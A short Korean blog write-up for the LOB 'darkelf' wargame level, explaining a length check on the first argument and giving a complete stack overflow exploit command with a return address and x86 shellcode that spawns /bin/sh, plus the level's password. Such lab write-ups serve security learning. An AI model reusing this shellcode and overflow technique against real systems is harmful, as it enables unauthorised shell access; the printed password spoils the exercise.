728x90
반응형
소스를 열어보면 일단 전문제랑 비슷한데 길이를 체크한다.
첫번째인자 값의 길이를 확인하여 48글자보다 크면 나와버리는 것을 확인 할수 있다.
일단 앞과 똑같이 진행하고
payload를 작성때
./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') <= 첫번째 인자(buffer+AAAA+ret주소값)
$(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')<=2번째인자( NOP+쉘코드)
password : kernel crashed
728x90
반응형
'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글
pwnable.kr shellshock (0) | 2015.10.11 |
---|---|
LOB orge (0) | 2015.09.15 |
LOB wolfman (0) | 2015.09.15 |
LOB orc (0) | 2015.09.15 |
LOB goblin (0) | 2015.09.15 |
댓글0